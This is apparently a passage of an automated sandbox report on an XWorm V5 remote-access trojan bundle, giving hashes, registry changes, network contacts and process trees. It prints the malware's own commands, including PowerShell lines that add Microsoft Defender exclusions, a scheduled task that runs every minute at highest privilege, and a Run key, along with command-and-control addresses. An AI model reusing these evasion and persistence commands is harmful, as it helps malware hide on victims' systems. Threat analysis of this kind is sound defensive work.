| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/2572-0-0x000007FEF6183000-0x000007FEF6184000-memory.dmp
memory/2572-1-0x0000000001170000-0x000000000117E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | a731d63dc3edd963b906d0f861f7119c |
| SHA1 | 378d5339f1b675e98c81f4446f9e9ad81bc9da9f |
| SHA256 | 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad |
| SHA512 | 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6 |
memory/1800-7-0x0000000000130000-0x000000000013C000-memory.dmp
memory/1800-11-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Downloader.hta
| MD5 | f27fe2354ebb52cffbb3a8cf66c6bdb3 |
| SHA1 | 439ce7924db3f534a14d78470c57c98e397969ee |
| SHA256 | 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4 |
| SHA512 | 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f |
memory/2812-12-0x0000000000160000-0x0000000000170000-memory.dmp
memory/2300-17-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/2300-18-0x0000000002080000-0x0000000002088000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d6288b5bc31fa80d87f5a2741f702a7e |
| SHA1 | dde30199e258f61238a463d083cb33bad653f747 |
| SHA256 | 530ae6615edb670572d84c86e1c294e174e920ebb3e5b4112051b889413f003b |
| SHA512 | 257ac3a3a996e2803e4aaa1609d50f2d5d1e21071082534258972ae0d26c927e57e579444fc525df6477b4f83039b989553900255060ea5636840e8bea6161cf |
memory/1564-24-0x000000001B800000-0x000000001BAE2000-memory.dmp
memory/1564-25-0x0000000001E70000-0x0000000001E78000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | f065a5f352973e89b2e8d3efd79b98f8 |
| SHA1 | 6a9a84e0a11010262ea35790fcdf824193805c76 |
| SHA256 | 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405 |
| SHA512 | b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006 |
memory/1616-45-0x0000000001160000-0x0000000001170000-memory.dmp
memory/2840-51-0x00000000013B0000-0x00000000013C0000-memory.dmp
memory/2068-55-0x00000000002E0000-0x00000000002F0000-memory.dmp
memory/2236-57-0x0000000000020000-0x0000000000030000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:39
Platform
win7-20240704-en
Max time kernel
360s
Max time network
370s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:41
Platform
win7-20240705-en
Max time kernel
361s
Max time network
364s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:38
Platform
win7-20240704-en
Max time kernel
309s
Max time network
319s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1
Network
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:41
Platform
win10v2004-20240802-en
Max time kernel
432s
Max time network
434s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:32
Platform
win7-20240708-en
Max time kernel
357s
Max time network
360s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:38
Platform
win10v2004-20240802-en
Max time kernel
428s
Max time network
430s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Mdb.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:38
Platform
win10v2004-20240802-en
Max time kernel
441s
Max time network
443s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:28
Platform
win7-20240729-en
Max time kernel
314s
Max time network
316s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:28
Platform
win7-20240704-en
Max time kernel
307s
Max time network
316s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:29
Platform
win7-20240729-en
Max time kernel
314s
Max time network
317s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:40
Platform
win7-20240704-en
Max time kernel
361s
Max time network
364s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:41
Platform
win10v2004-20240802-en
Max time kernel
421s
Max time network
424s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:29
Platform
win7-20240708-en
Max time kernel
359s
Max time network
362s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:37
Platform
win7-20240729-en
Max time kernel
580s
Max time network
592s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Windows\system32\taskeng.exe
taskeng.exe {E4D399A1-1056-4EA6-BB64-DA63AD9DC360} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 154.61.71.50:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp |
Files
memory/1936-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp
memory/1936-1-0x00000000003A0000-0x00000000003D4000-memory.dmp
memory/1936-2-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp
memory/2684-7-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/2684-8-0x0000000001E10000-0x0000000001E18000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f4c6c1b7c71397124c059b6996310a35 |
| SHA1 | 8a837e53686e77a07859d60a98fab24c36079d3a |
| SHA256 | 6b4d966e98ea6966e454af2c83cdd758c625ae625e7ae038349e534b13a82e49 |
| SHA512 | fba0a7230e7e6265e8bd4210896211f0d86bdd3d811f502aa3c9b50a6dd60c1e9d0b6b4213ab956b354569079ada143d1fb7138b720eaa85bcb0d0cf2ab9bdfc |
memory/2472-14-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2472-15-0x0000000002670000-0x0000000002678000-memory.dmp
memory/1936-29-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp
memory/1936-30-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:38
Platform
win10v2004-20240802-en
Max time kernel
597s
Max time network
601s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWorm V5.lnk | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XWorm V5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2" | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 154.61.71.50:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| AE | 86.96.100.98:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 31.167.24.129:7000 | tcp | |
| SA | 2.90.87.156:7000 | tcp | |
| NL | 154.61.71.50:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp | |
| AE | 86.96.100.98:7000 | tcp |
Files
memory/4444-0-0x00007FFD673D3000-0x00007FFD673D5000-memory.dmp
memory/4444-1-0x0000000000D80000-0x0000000000DB4000-memory.dmp
memory/4444-2-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp
memory/3708-3-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp
memory/3708-4-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qisji2os.5ar.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3708-11-0x000002AD71A80000-0x000002AD71AA2000-memory.dmp
memory/3708-16-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15dde0683cd1ca19785d7262f554ba93 |
| SHA1 | d039c577e438546d10ac64837b05da480d06bf69 |
| SHA256 | d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961 |
| SHA512 | 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4fc1ceefa94c82f73b7ee478e2920ea3 |
| SHA1 | 17a031c8d10e316478d85d24ba8a8b5ebfda3149 |
| SHA256 | 018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb |
| SHA512 | cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311 |
memory/4444-53-0x00007FFD673D3000-0x00007FFD673D5000-memory.dmp
memory/4444-54-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2
| MD5 | b2234a1b2a6b4b0e9bfbeeb540e86725 |
| SHA1 | d1e45aa8f1136a8809837ad72943dc7e580767e1 |
